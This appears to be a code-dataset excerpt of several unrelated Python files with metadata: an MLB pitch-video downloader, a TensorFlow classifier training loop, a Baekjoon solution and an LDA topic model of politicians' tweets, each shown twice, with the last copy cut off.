"CompletionTime": "2020-03-27T02:27:45", "Description": "Job Instance", "EndTime": null, "Id": "JID_852940632485", "JobState": "Completed", "JobType": "ImportConfiguration", "Message": "Successfully imported and applied Server Configuration Profile.", "MessageArgs": [], "<EMAIL>": 0, "MessageId": "SYS053", "Name": "Import Configuration", "PercentComplete": 100, "StartTime": "TIME_NOW", "Status": "Success", "TargetSettingsURI": null, "retval": true } error_info: description: Details of the HTTP Error. returned: on HTTP error type: dict sample: { "error": { "code": "Base.1.0.GeneralError", "message": "A general error has occurred. See ExtendedInfo for more information.", "@Message.ExtendedInfo": [ { "MessageId": "GEN1234", "RelatedProperties": [], "Message": "Unable to process the request because an error occurred.", "MessageArgs": [], "Severity": "Critical", "Resolution": "Retry the operation. If the issue persists, contact your system administrator." } ] } } | 1.473211 | 1 |
utils.py | rmcanada/pitcher-release-point | 0 | 6632536 | import os
import json
import urllib.request
import subprocess
import argparse
import shutil
parser = argparse.ArgumentParser()
parser.add_argument('--guid', help='guid from json of video')
json_files = [pos_json for pos_json in os.listdir('.') if pos_json.endswith('.json')]
def download_video(url):
try:
ret1 = subprocess.call(['wget',"-P", "./",url,])
if ret1 > 0:
raise Exception('could not wget')
except Exception as e:
print (str(e))
raise e
def get_video_url(pitch_dict):
# check to see that the data pertains to a pitch and not a pickoff
if (pitch_dict['isPickoff'] and not pitch_dict['isPitch']):
print("Not pitch, pick off")
return "Pickoff"
# subset info on playback types to iterate through
video_playbacks = pitch_dict['video']['playbackGroups']
# loop through playback types looking for centrefield camera
for i in range(len(video_playbacks)):
if video_playbacks[i]['mediaSourceType'] == "CENTERFIELD":
max_bit = 0
max_bit_index = None
# create subset of playback data pertaining to current data
cf = video_playbacks[i]
for iter, j in enumerate(cf['playbackRenditions']):
# if bitrate is higher than current max bitrate, pick
bitrate = int(j['bitrate'].strip("K"))
if bitrate > max_bit:
max_bit = bitrate
max_bit_index = iter
# print(max_bit_index)
video_url = cf['playbackRenditions'][max_bit_index]['playbackUrl']
return video_url
def build_dict(seq, key):
return dict((d[key], dict(d, index=index)) for (index, d) in enumerate(seq))
def json_data(guid):
for j in json_files:
with open(j, 'r') as myfile:
data=myfile.read()
if guid in data:
# print(j)
obj = json.loads(data)
# print("got obj")
return obj
# else:
print("Cannot find GUID, please enter GUID from a JSON file in current dir")
return
def clear_images():
folder = './images/'
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
except Exception as e:
print(e)
def main():
args = parser.parse_args()
guid = args.guid
# search in json files for the guid
obj = json_data(guid)
if obj is not None:
info = build_dict(obj, key="guid")
# pickoff attempt example
# pitch_dict = info.get("09812143-51f6-4dd9-9789-d72c53354980")
pitch_dict = info.get(guid)
url = get_video_url(pitch_dict)
vid = url.split('https://sporty-clips.mlb.com/')[1]
vid_img = vid.split("-")[0]
if url is not None:
# delete old videos
for item in os.listdir("."):
if item.endswith(".mp4"):
os.remove(item)
download_video(url)
print("removing old images...")
clear_images()
subprocess.call(['ffmpeg','-i', vid, "-q:v","1",'images/{}_%04d.jpg'.format(vid_img,"")])
else: print("no url found")
if __name__ == '__main__':
main()
# ret = subprocess.call(['ffmpeg','-i', video_src, '-c' , 'copy', '-t', clip_duration,
# '-vcodec', 'libx264', '{}/{}_{}.mp4'.format(event_type,os.path.splitext(video_src)[0],"{:02d}".format(clip_num))])
# if ret > 0:
# raise Exception('ffmpeg could not split the video to clips')
# print('Beginning file download... {}'.format(url))
# urllib.request.urlretrieve("{}".format(url), headers={'User-Agent': 'Mozilla/5.0'})
# data = urllib.request.urlretrieve("{}".format(url))
# req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
# webpage = urlopen(req).read()
# urllib.request.urlretrieve(link, 'video_name.mp4')
# urllib.request.urlretrieve(link)
# # print the keys and values
# for key in obj:
# # loop through each entry in the json file, which is a recorded pitch (key is a pitch)
# # get the video list from each pitch which is called playbackGroup, returns list
# vid_playback = key['video']['playbackGroups']
# for i in range(len(vid_playback)):
# # iterate through list and get centerfield playbackrenditions
# # extract centerfield camera and max bitrate
# if vid_playback[i]['mediaSourceType'] == "CENTERFIELD":
# max_bit = 0
# max_bit_index = None
# cf = vid_playback[i]
# for iter, j in enumerate(cf['playbackRenditions']):
# # print(iter)
# # print(j)
# bitrate = int(j['bitrate'].strip("K"))
# if bitrate > max_bit:
# max_bit = bitrate
# max_bit_index = iter
# # print(max_bit_index)
# print(cf['playbackRenditions'][max_bit_index]['playbackUrl']) | import os
import json
import urllib.request
import subprocess
import argparse
import shutil
parser = argparse.ArgumentParser()
parser.add_argument('--guid', help='guid from json of video')
json_files = [pos_json for pos_json in os.listdir('.') if pos_json.endswith('.json')]
def download_video(url):
try:
ret1 = subprocess.call(['wget',"-P", "./",url,])
if ret1 > 0:
raise Exception('could not wget')
except Exception as e:
print (str(e))
raise e
def get_video_url(pitch_dict):
# check to see that the data pertains to a pitch and not a pickoff
if (pitch_dict['isPickoff'] and not pitch_dict['isPitch']):
print("Not pitch, pick off")
return "Pickoff"
# subset info on playback types to iterate through
video_playbacks = pitch_dict['video']['playbackGroups']
# loop through playback types looking for centrefield camera
for i in range(len(video_playbacks)):
if video_playbacks[i]['mediaSourceType'] == "CENTERFIELD":
max_bit = 0
max_bit_index = None
# create subset of playback data pertaining to current data
cf = video_playbacks[i]
for iter, j in enumerate(cf['playbackRenditions']):
# if bitrate is higher than current max bitrate, pick
bitrate = int(j['bitrate'].strip("K"))
if bitrate > max_bit:
max_bit = bitrate
max_bit_index = iter
# print(max_bit_index)
video_url = cf['playbackRenditions'][max_bit_index]['playbackUrl']
return video_url
def build_dict(seq, key):
return dict((d[key], dict(d, index=index)) for (index, d) in enumerate(seq))
def json_data(guid):
for j in json_files:
with open(j, 'r') as myfile:
data=myfile.read()
if guid in data:
# print(j)
obj = json.loads(data)
# print("got obj")
return obj
# else:
print("Cannot find GUID, please enter GUID from a JSON file in current dir")
return
def clear_images():
folder = './images/'
for the_file in os.listdir(folder):
file_path = os.path.join(folder, the_file)
try:
if os.path.isfile(file_path):
os.unlink(file_path)
except Exception as e:
print(e)
def main():
args = parser.parse_args()
guid = args.guid
# search in json files for the guid
obj = json_data(guid)
if obj is not None:
info = build_dict(obj, key="guid")
# pickoff attempt example
# pitch_dict = info.get("09812143-51f6-4dd9-9789-d72c53354980")
pitch_dict = info.get(guid)
url = get_video_url(pitch_dict)
vid = url.split('https://sporty-clips.mlb.com/')[1]
vid_img = vid.split("-")[0]
if url is not None:
# delete old videos
for item in os.listdir("."):
if item.endswith(".mp4"):
os.remove(item)
download_video(url)
print("removing old images...")
clear_images()
subprocess.call(['ffmpeg','-i', vid, "-q:v","1",'images/{}_%04d.jpg'.format(vid_img,"")])
else: print("no url found")
if __name__ == '__main__':
main()
# ret = subprocess.call(['ffmpeg','-i', video_src, '-c' , 'copy', '-t', clip_duration,
# '-vcodec', 'libx264', '{}/{}_{}.mp4'.format(event_type,os.path.splitext(video_src)[0],"{:02d}".format(clip_num))])
# if ret > 0:
# raise Exception('ffmpeg could not split the video to clips')
# print('Beginning file download... {}'.format(url))
# urllib.request.urlretrieve("{}".format(url), headers={'User-Agent': 'Mozilla/5.0'})
# data = urllib.request.urlretrieve("{}".format(url))
# req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
# webpage = urlopen(req).read()
# urllib.request.urlretrieve(link, 'video_name.mp4')
# urllib.request.urlretrieve(link)
# # print the keys and values
# for key in obj:
# # loop through each entry in the json file, which is a recorded pitch (key is a pitch)
# # get the video list from each pitch which is called playbackGroup, returns list
# vid_playback = key['video']['playbackGroups']
# for i in range(len(vid_playback)):
# # iterate through list and get centerfield playbackrenditions
# # extract centerfield camera and max bitrate
# if vid_playback[i]['mediaSourceType'] == "CENTERFIELD":
# max_bit = 0
# max_bit_index = None
# cf = vid_playback[i]
# for iter, j in enumerate(cf['playbackRenditions']):
# # print(iter)
# # print(j)
# bitrate = int(j['bitrate'].strip("K"))
# if bitrate > max_bit:
# max_bit = bitrate
# max_bit_index = iter
# # print(max_bit_index)
# print(cf['playbackRenditions'][max_bit_index]['playbackUrl']) | en | 0.617637 | # check to see that the data pertains to a pitch and not a pickoff # subset info on playback types to iterate through # loop through playback types looking for centrefield camera # create subset of playback data pertaining to current data # if bitrate is higher than current max bitrate, pick # print(max_bit_index) # print(j) # print("got obj") # else: # search in json files for the guid # pickoff attempt example # pitch_dict = info.get("09812143-51f6-4dd9-9789-d72c53354980") # delete old videos # ret = subprocess.call(['ffmpeg','-i', video_src, '-c' , 'copy', '-t', clip_duration, # '-vcodec', 'libx264', '{}/{}_{}.mp4'.format(event_type,os.path.splitext(video_src)[0],"{:02d}".format(clip_num))]) # if ret > 0: # raise Exception('ffmpeg could not split the video to clips') # print('Beginning file download... {}'.format(url)) # urllib.request.urlretrieve("{}".format(url), headers={'User-Agent': 'Mozilla/5.0'}) # data = urllib.request.urlretrieve("{}".format(url)) # req = Request(url, headers={'User-Agent': 'Mozilla/5.0'}) # webpage = urlopen(req).read() # urllib.request.urlretrieve(link, 'video_name.mp4') # urllib.request.urlretrieve(link) # # print the keys and values # for key in obj: # # loop through each entry in the json file, which is a recorded pitch (key is a pitch) # # get the video list from each pitch which is called playbackGroup, returns list # vid_playback = key['video']['playbackGroups'] # for i in range(len(vid_playback)): # # iterate through list and get centerfield playbackrenditions # # extract centerfield camera and max bitrate # if vid_playback[i]['mediaSourceType'] == "CENTERFIELD": # max_bit = 0 # max_bit_index = None # cf = vid_playback[i] # for iter, j in enumerate(cf['playbackRenditions']): # # print(iter) # # print(j) # bitrate = int(j['bitrate'].strip("K")) # if bitrate > max_bit: # max_bit = bitrate # max_bit_index = iter # # print(max_bit_index) # print(cf['playbackRenditions'][max_bit_index]['playbackUrl']) | 2.749222 | 3 |
strategies/cdnnc.py | aladics/DeepBugHunter | 6 | 6632537 | <filename>strategies/cdnnc.py
import os
import shutil
import math
import logging
import argparse
import tensorflow as tf
from tensorflow.python.platform import tf_logging
import dbh_util as util
import classifier as cl
import pandas2tf
EPS = 1e-8
CLASSES = 2
def log(msg):
tf_logging.log(tf_logging.FATAL, msg) # FATAL to show up at any TF logging level
logging.getLogger('DeepBugHunter').info(msg)
#
# Strategy args
#
parser = argparse.ArgumentParser()
parser.add_argument('--layers', type=int, help='Number of layers')
parser.add_argument('--neurons', type=int, help='Number of neurons per layer')
parser.add_argument('--batch', type=int, help='Batch size')
parser.add_argument('--lr', type=float, help='Starting learning rate')
parser.add_argument('--beta', type=float, default=0.0, help='L2 regularization bias')
parser.add_argument('--max-misses', type=int, default=4, help='Maximum consecutive misses before early stopping')
parser.add_argument('--sandbox', default=os.path.abspath('sandbox'), help='Intermediary model folder')
#
# Validate after every epoch, and if the model gets worse, then restore the previous best model and try again
# with a reduced (halved) learning rate
#
def predict(classifier, test, args, sargs_str):
sargs = util.parse(parser, sargs_str.split())
preds = classifier.predict(input_fn=lambda:pandas2tf.eval_input_fn(test, sargs['batch']))
return [pred['class_ids'] for pred in preds]
def learn(train, dev, test, args, sargs_str):
# Read strategy-specific args
sargs = util.parse(parser, sargs_str.split())
# Clean out the sandbox
util.mkdir(sargs['sandbox'], clean=True)
# Feature columns describe how to use the input
my_feature_columns = []
for key in train[0].keys():
my_feature_columns.append(tf.feature_column.numeric_column(key=key))
# Calculate epoch length
steps_per_epoch = math.ceil(len(train[0]) / sargs['batch'])
# Train a classifier
# Repeat until the model consecutively "misses" a set number of times
rounds = 1
misses = miss_streak = 0
best_result = {'fmes': -1}
best_model_dir = None
best_classifier = None
while miss_streak < sargs['max_misses']:
model_dir = os.path.join(sargs['sandbox'], 'run_' + str(rounds) + '_' + str(miss_streak))
extra_args = {
'classes': CLASSES,
'columns': my_feature_columns,
'steps_per_epoch': steps_per_epoch,
'learning_rate': sargs['lr'] / (2 ** misses),
'model_dir': model_dir,
'warm_start_dir': best_model_dir
}
merged_args = {**args, **sargs, **extra_args}
# Create a new classifier instance
classifier = cl.create_classifier(merged_args)
# Train the model for exactly 1 epoch
classifier.train(
input_fn=lambda:pandas2tf.train_input_fn(train, sargs['batch']),
steps=steps_per_epoch)
# Evaluate the model
eval_result = classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(dev, sargs['batch']))
log('Round ' + str(rounds) + '_' + str(miss_streak) + ', Fmes: ' + str(best_result['fmes']) + ' --> ' + str(eval_result['fmes']))
if eval_result['fmes'] > best_result['fmes']:
best_result = eval_result
best_model_dir = model_dir
best_classifier = classifier
miss_streak = 0
rounds += 1
log('Improvement, go on...')
else:
miss_streak += 1
misses += 1
log('Miss #' + str(misses) + ', (streak = ' + str(miss_streak) + ')')
# Cleanup sandbox not to run out of space due to models
for m_dir in os.listdir(sargs['sandbox']):
abs_m_dir = os.path.join(sargs['sandbox'], m_dir)
if best_model_dir != abs_m_dir and model_dir != abs_m_dir:
tf.summary.FileWriterCache.clear()
shutil.rmtree(abs_m_dir)
final_result_train = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(train, sargs['batch']))
final_result_dev = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(dev, sargs['batch']))
final_result_test = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(test, sargs['batch']))
return final_result_train, final_result_dev, final_result_test, best_classifier
| <filename>strategies/cdnnc.py
import os
import shutil
import math
import logging
import argparse
import tensorflow as tf
from tensorflow.python.platform import tf_logging
import dbh_util as util
import classifier as cl
import pandas2tf
EPS = 1e-8
CLASSES = 2
def log(msg):
tf_logging.log(tf_logging.FATAL, msg) # FATAL to show up at any TF logging level
logging.getLogger('DeepBugHunter').info(msg)
#
# Strategy args
#
parser = argparse.ArgumentParser()
parser.add_argument('--layers', type=int, help='Number of layers')
parser.add_argument('--neurons', type=int, help='Number of neurons per layer')
parser.add_argument('--batch', type=int, help='Batch size')
parser.add_argument('--lr', type=float, help='Starting learning rate')
parser.add_argument('--beta', type=float, default=0.0, help='L2 regularization bias')
parser.add_argument('--max-misses', type=int, default=4, help='Maximum consecutive misses before early stopping')
parser.add_argument('--sandbox', default=os.path.abspath('sandbox'), help='Intermediary model folder')
#
# Validate after every epoch, and if the model gets worse, then restore the previous best model and try again
# with a reduced (halved) learning rate
#
def predict(classifier, test, args, sargs_str):
sargs = util.parse(parser, sargs_str.split())
preds = classifier.predict(input_fn=lambda:pandas2tf.eval_input_fn(test, sargs['batch']))
return [pred['class_ids'] for pred in preds]
def learn(train, dev, test, args, sargs_str):
# Read strategy-specific args
sargs = util.parse(parser, sargs_str.split())
# Clean out the sandbox
util.mkdir(sargs['sandbox'], clean=True)
# Feature columns describe how to use the input
my_feature_columns = []
for key in train[0].keys():
my_feature_columns.append(tf.feature_column.numeric_column(key=key))
# Calculate epoch length
steps_per_epoch = math.ceil(len(train[0]) / sargs['batch'])
# Train a classifier
# Repeat until the model consecutively "misses" a set number of times
rounds = 1
misses = miss_streak = 0
best_result = {'fmes': -1}
best_model_dir = None
best_classifier = None
while miss_streak < sargs['max_misses']:
model_dir = os.path.join(sargs['sandbox'], 'run_' + str(rounds) + '_' + str(miss_streak))
extra_args = {
'classes': CLASSES,
'columns': my_feature_columns,
'steps_per_epoch': steps_per_epoch,
'learning_rate': sargs['lr'] / (2 ** misses),
'model_dir': model_dir,
'warm_start_dir': best_model_dir
}
merged_args = {**args, **sargs, **extra_args}
# Create a new classifier instance
classifier = cl.create_classifier(merged_args)
# Train the model for exactly 1 epoch
classifier.train(
input_fn=lambda:pandas2tf.train_input_fn(train, sargs['batch']),
steps=steps_per_epoch)
# Evaluate the model
eval_result = classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(dev, sargs['batch']))
log('Round ' + str(rounds) + '_' + str(miss_streak) + ', Fmes: ' + str(best_result['fmes']) + ' --> ' + str(eval_result['fmes']))
if eval_result['fmes'] > best_result['fmes']:
best_result = eval_result
best_model_dir = model_dir
best_classifier = classifier
miss_streak = 0
rounds += 1
log('Improvement, go on...')
else:
miss_streak += 1
misses += 1
log('Miss #' + str(misses) + ', (streak = ' + str(miss_streak) + ')')
# Cleanup sandbox not to run out of space due to models
for m_dir in os.listdir(sargs['sandbox']):
abs_m_dir = os.path.join(sargs['sandbox'], m_dir)
if best_model_dir != abs_m_dir and model_dir != abs_m_dir:
tf.summary.FileWriterCache.clear()
shutil.rmtree(abs_m_dir)
final_result_train = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(train, sargs['batch']))
final_result_dev = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(dev, sargs['batch']))
final_result_test = best_classifier.evaluate(input_fn=lambda:pandas2tf.eval_input_fn(test, sargs['batch']))
return final_result_train, final_result_dev, final_result_test, best_classifier
| en | 0.753046 | # FATAL to show up at any TF logging level # # Strategy args # # # Validate after every epoch, and if the model gets worse, then restore the previous best model and try again # with a reduced (halved) learning rate # # Read strategy-specific args # Clean out the sandbox # Feature columns describe how to use the input # Calculate epoch length # Train a classifier # Repeat until the model consecutively "misses" a set number of times # Create a new classifier instance # Train the model for exactly 1 epoch # Evaluate the model #' + str(misses) + ', (streak = ' + str(miss_streak) + ')') # Cleanup sandbox not to run out of space due to models | 2.390537 | 2 |
baekjoon/2775.py | DevStarSJ/algorithmExercise | 0 | 6632538 | <filename>baekjoon/2775.py
def GetNum_timeout(k,n):
if k == 0:
return n
result = 0
for i in range(0,n+1):
result += GetNum(k-1, i)
return result
apt = []
def makeApt(k,n):
apt.append([])
for i in range(n):
apt[0].append(i+1)
for i in range(k-1):
apt.append([])
for j in range(n):
res = 0
for k in range(j+1):
res += apt[i][k]
apt[i+1].append(res)
def GetNum(k,n):
result = 0
for i in range(n):
result += apt[k-1][i]
return result
if __name__ == "__main__":
num = int(input())
K, N = [], []
for _ in range(num):
K.append(int(input()))
N.append(int(input()))
makeApt(max(K), max(N))
for i in range(num):
print(GetNum(K[i],N[i]))
# 1호 : 1
# 2호 : 2,3,4,5,6 : k
# 3호 : 3, 6, 10, 15 : n + (n+1) + (n+2) ... kn+ 0~n까지 합
# 4호 : 4, 10, 20, 35 : 6, 10, 15
| <filename>baekjoon/2775.py
def GetNum_timeout(k,n):
if k == 0:
return n
result = 0
for i in range(0,n+1):
result += GetNum(k-1, i)
return result
apt = []
def makeApt(k,n):
apt.append([])
for i in range(n):
apt[0].append(i+1)
for i in range(k-1):
apt.append([])
for j in range(n):
res = 0
for k in range(j+1):
res += apt[i][k]
apt[i+1].append(res)
def GetNum(k,n):
result = 0
for i in range(n):
result += apt[k-1][i]
return result
if __name__ == "__main__":
num = int(input())
K, N = [], []
for _ in range(num):
K.append(int(input()))
N.append(int(input()))
makeApt(max(K), max(N))
for i in range(num):
print(GetNum(K[i],N[i]))
# 1호 : 1
# 2호 : 2,3,4,5,6 : k
# 3호 : 3, 6, 10, 15 : n + (n+1) + (n+2) ... kn+ 0~n까지 합
# 4호 : 4, 10, 20, 35 : 6, 10, 15
| ko | 0.469472 | # 1호 : 1 # 2호 : 2,3,4,5,6 : k # 3호 : 3, 6, 10, 15 : n + (n+1) + (n+2) ... kn+ 0~n까지 합 # 4호 : 4, 10, 20, 35 : 6, 10, 15 | 3.218167 | 3 |
Data Processing/twitter_model_generation.py | reallyrehan/pollytics | 1 | 6632539 | <filename>Data Processing/twitter_model_generation.py
import sys
if 'google.colab' in sys.modules:
!pip install emoji --upgrade
!pip install pandas-profiling==2.*
!pip install plotly==4.*
#!python -m spacy download en_core_web_lg
!pip install pyldavis
!pip install gensim
!pip install chart_studio
!pip install --upgrade autopep8
#Base and Cleaning
import json
import requests
import pandas as pd
import numpy as np
import emoji
import regex
import re
import string
from collections import Counter
#Visualizations
import plotly.express as px
import seaborn as sns
import matplotlib.pyplot as plt
import pyLDAvis.gensim
import chart_studio
import chart_studio.plotly as py
import chart_studio.tools as tls
#Natural Language Processing (NLP)
import spacy
import gensim
from spacy.tokenizer import Tokenizer
from gensim.corpora import Dictionary
from gensim.models.ldamulticore import LdaMulticore
from gensim.models.coherencemodel import CoherenceModel
from gensim.parsing.preprocessing import STOPWORDS as SW
from sklearn.decomposition import LatentDirichletAllocation, TruncatedSVD
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.model_selection import GridSearchCV
from pprint import pprint
from wordcloud import STOPWORDS
from gensim import corpora
import pickle
import gensim
import re
from nltk.corpus import wordnet as wn
import spacy
from nltk.stem.wordnet import WordNetLemmatizer
from spacy.lang.en import English
import random
from datetime import datetime
def tokenize(text):
lda_tokens = []
tokens = parser(text)
for token in tokens:
if token.orth_.isspace():
continue
elif token.like_url:
url_list.append(token)
elif token.orth_.startswith('@'):
user_list.append(token)
else:
lda_tokens.append(token.lower_)
return lda_tokens
def get_lemma(word):
lemma = wn.morphy(word)
if lemma is None:
return word
else:
return lemma
def get_lemma2(word):
return WordNetLemmatizer().lemmatize(word)
def prepare_text_for_lda(text):
hashtag_list.append(re.findall(r"#(\w+)", text))
tokens = tokenize(text)
tokens = [token for token in tokens if len(token) > 4]
tokens = [token for token in tokens if token not in en_stop]
tokens = [get_lemma(token) for token in tokens]
tokens = [token for token in tokens if token != "SCREEN_NAME"]
return tokens
def prepare_text_for_lda(text):
hashtag_list.append(re.findall(r"#(\w+)", text))
tokens = tokenize(text)
tokens = [token for token in tokens if len(token) > 4]
tokens = [token for token in tokens if token not in en_stop]
tokens = [get_lemma(token) for token in tokens]
tokens = [token for token in tokens if token != "SCREEN_NAME"]
return tokens
def give_emoji_free_text(text):
"""
Removes emoji's from tweets
Accepts:
Text (tweets)
Returns:
Text (emoji free tweets)
"""
emoji_list = [c for c in text if c in emoji.UNICODE_EMOJI]
clean_text = ' '.join([str for str in text.split() if not any(i in str for i in emoji_list)])
return clean_text
def url_free_text(text):
'''
Cleans text from urls
'''
text = re.sub(r'http\S+', '', text)
return text
stopwords = set(STOPWORDS)
nltk.download('wordnet')
nltk.download('stopwords')
en_stop = set(nltk.corpus.stopwords.words('english'))
from spacy.lang.en import English
spacy.load('en')
parser = English()
st_date_object = datetime.strptime("2020-01-01", '%Y-%m-%d')
b_tweet = []
d_tweet = []
for bd in biden_tweets:
if st_date_object<=datetime.strptime(bd['UTC'].split('T')[0], '%Y-%m-%d'):
b_tweet.append(bd['Text'])
d_tweet.append(datetime.strptime(bd['UTC'].split('T')[0], '%Y-%m-%d'))
biden_df = pd.DataFrame({"text":b_tweet,"date":d_tweet})
df = biden_df
call_emoji_free = lambda x: give_emoji_free_text(x)
df['emoji_free_tweets'] = df['text'].apply(call_emoji_free)
df['url_free_tweets'] = df['emoji_free_tweets'].apply(url_free_text)
url_list = []
user_list = []
hashtag_list = []
tokens = []
for doc in df['url_free_tweets']:
doc_tokens = []
doc_tokens = prepare_text_for_lda(doc)
tokens.append(doc_tokens)
# Makes tokens column
df['tokens'] = tokens
id2word = Dictionary(df['tokens'])
id2word.filter_extremes(no_below=2, no_above=.99)
corpus = [id2word.doc2bow(d) for d in df['tokens']]
# Instantiating a Base LDA model
base_model = LdaMulticore(corpus=corpus, num_topics=10, id2word=id2word, workers=12, passes=5)
words = [re.findall(r'"([^"]*)"',t[1]) for t in base_model.print_topics()]
topics = [' '.join(t[0:10]) for t in words]
# Getting the topics
for id, t in enumerate(topics):
print(f"------ Topic {id} ------")
print(t, end="\n\n")
p=pyLDAvis.gensim.prepare(base_model, corpus, id2word)
pyLDAvis.save_html(p, 'biden_lda.html')
ldamodel.save('biden_model.gensim')
biden_df=df
st_date_object = datetime.strptime("2020-01-01", '%Y-%m-%d')
b_tweet = []
d_tweet = []
for bd in trump_tweets:
if st_date_object<=datetime.strptime(bd['date'].split(' ')[0], '%Y-%m-%d'):
b_tweet.append(bd['text'])
d_tweet.append(datetime.strptime(bd['date'].split(' ')[0], '%Y-%m-%d'))
trump_df = pd.DataFrame({"text":b_tweet,"date":d_tweet})
df = trump_df
call_emoji_free = lambda x: give_emoji_free_text(x)
df['emoji_free_tweets'] = df['text'].apply(call_emoji_free)
df['url_free_tweets'] = df['emoji_free_tweets'].apply(url_free_text)
url_list = []
user_list = []
hashtag_list = []
tokens = []
for doc in df['url_free_tweets']:
doc_tokens = []
doc_tokens = prepare_text_for_lda(doc)
tokens.append(doc_tokens)
# Makes tokens column
df['tokens'] = tokens
id2word = Dictionary(df['tokens'])
id2word.filter_extremes(no_below=2, no_above=.99)
corpus = [id2word.doc2bow(d) for d in df['tokens']]
base_model = LdaMulticore(corpus=corpus, num_topics=10, id2word=id2word, workers=12, passes=5)
words = [re.findall(r'"([^"]*)"',t[1]) for t in base_model.print_topics()]
topics = [' '.join(t[0:10]) for t in words]
# Getting the topics
for id, t in enumerate(topics):
print(f"------ Topic {id} ------")
print(t, end="\n\n")
p=pyLDAvis.gensim.prepare(base_model, corpus, id2word)
pyLDAvis.save_html(p, 'trump_lda.html')
ldamodel.save('trump_model.gensim')
trump_df=df
| <filename>Data Processing/twitter_model_generation.py
import sys
if 'google.colab' in sys.modules:
!pip install emoji --upgrade
!pip install pandas-profiling==2.*
!pip install plotly==4.*
#!python -m spacy download en_core_web_lg
!pip install pyldavis
!pip install gensim
!pip install chart_studio
!pip install --upgrade autopep8
#Base and Cleaning
import json
import requests
import pandas as pd
import numpy as np
import emoji
import regex
import re
import string
from collections import Counter
#Visualizations
import plotly.express as px
import seaborn as sns
import matplotlib.pyplot as plt
import pyLDAvis.gensim
import chart_studio
import chart_studio.plotly as py
import chart_studio.tools as tls
#Natural Language Processing (NLP)
import spacy
import gensim
from spacy.tokenizer import Tokenizer
from gensim.corpora import Dictionary
from gensim.models.ldamulticore import LdaMulticore
from gensim.models.coherencemodel import CoherenceModel
from gensim.parsing.preprocessing import STOPWORDS as SW
from sklearn.decomposition import LatentDirichletAllocation, TruncatedSVD
from sklearn.feature_extraction.text import CountVectorizer, TfidfVectorizer
from sklearn.model_selection import GridSearchCV
from pprint import pprint
from wordcloud import STOPWORDS
from gensim import corpora
import pickle
import gensim
import re
from nltk.corpus import wordnet as wn
import spacy
from nltk.stem.wordnet import WordNetLemmatizer
from spacy.lang.en import English
import random
from datetime import datetime
def tokenize(text):
lda_tokens = []
tokens = parser(text)
for token in tokens:
if token.orth_.isspace():
continue
elif token.like_url:
url_list.append(token)
elif token.orth_.startswith('@'):
user_list.append(token)
else:
lda_tokens.append(token.lower_)
return lda_tokens
def get_lemma(word):
lemma = wn.morphy(word)
if lemma is None:
return word
else:
return lemma
def get_lemma2(word):
return WordNetLemmatizer().lemmatize(word)
def prepare_text_for_lda(text):
hashtag_list.append(re.findall(r"#(\w+)", text))
tokens = tokenize(text)
tokens = [token for token in tokens if len(token) > 4]
tokens = [token for token in tokens if token not in en_stop]
tokens = [get_lemma(token) for token in tokens]
tokens = [token for token in tokens if token != "SCREEN_NAME"]
return tokens
def prepare_text_for_lda(text):
hashtag_list.append(re.findall(r"#(\w+)", text))
tokens = tokenize(text)
tokens = [token for token in tokens if len(token) > 4]
tokens = [token for token in tokens if token not in en_stop]
tokens = [get_lemma(token) for token in tokens]
tokens = [token for token in tokens if token != "SCREEN_NAME"]
return tokens
def give_emoji_free_text(text):
"""
Removes emoji's from tweets
Accepts:
Text (tweets)
Returns:
Text (emoji free tweets)
"""
emoji_list = [c for c in text if c in emoji.UNICODE_EMOJI]
clean_text = ' '.join([str for str in text.split() if not any(i in str for i in emoji_list)])
return clean_text
def url_free_text(text):
'''
Cleans text from urls
'''
text = re.sub(r'http\S+', '', text)
return text
stopwords = set(STOPWORDS)
nltk.download('wordnet')
nltk.download('stopwords')
en_stop = set(nltk.corpus.stopwords.words('english'))
from spacy.lang.en import English
spacy.load('en')
parser = English()
st_date_object = datetime.strptime("2020-01-01", '%Y-%m-%d')
b_tweet = []
d_tweet = []
for bd in biden_tweets:
if st_date_object<=datetime.strptime(bd['UTC'].split('T')[0], '%Y-%m-%d'):
b_tweet.append(bd['Text'])
d_tweet.append(datetime.strptime(bd['UTC'].split('T')[0], '%Y-%m-%d'))
biden_df = pd.DataFrame({"text":b_tweet,"date":d_tweet})
df = biden_df
call_emoji_free = lambda x: give_emoji_free_text(x)
df['emoji_free_tweets'] = df['text'].apply(call_emoji_free)
df['url_free_tweets'] = df['emoji_free_tweets'].apply(url_free_text)
url_list = []
user_list = []
hashtag_list = []
tokens = []
for doc in df['url_free_tweets']:
doc_tokens = []
doc_tokens = prepare_text_for_lda(doc)
tokens.append(doc_tokens)
# Makes tokens column
df['tokens'] = tokens
id2word = Dictionary(df['tokens'])
id2word.filter_extremes(no_below=2, no_above=.99)
corpus = [id2word.doc2bow(d) for d in df['tokens']]
# Instantiating a Base LDA model
base_model = LdaMulticore(corpus=corpus, num_topics=10, id2word=id2word, workers=12, passes=5)
words = [re.findall(r'"([^"]*)"',t[1]) for t in base_model.print_topics()]
topics = [' '.join(t[0:10]) for t in words]
# Getting the topics
for id, t in enumerate(topics):
print(f"------ Topic {id} ------")
print(t, end="\n\n")
p=pyLDAvis.gensim.prepare(base_model, corpus, id2word)
pyLDAvis.save_html(p, 'biden_lda.html')
ldamodel.save('biden_model.gensim')
biden_df=df
st_date_object = datetime.strptime("2020-01-01", '%Y-%m-%d')
b_tweet = []
d_tweet = []
for bd in trump_tweets:
if st_date_object<=datetime.strptime(bd['date'].split(' ')[0], '%Y-%m-%d'):
b_tweet.append(bd['text'])
d_tweet.append(datetime.strptime(bd['date'].split(' ')[0], '%Y-%m-%d'))
trump_df = pd.DataFrame({"text":b_tweet,"date":d_tweet})
df = trump_df
call_emoji_free = lambda x: give_emoji_free_text(x)
df['emoji_free_tweets'] = df['text'].apply(call_emoji_free)
df['url_free_tweets'] = df['emoji_free_tweets'].apply(url_free_text)
url_list = []
user_list = []
hashtag_list = []
tokens = []
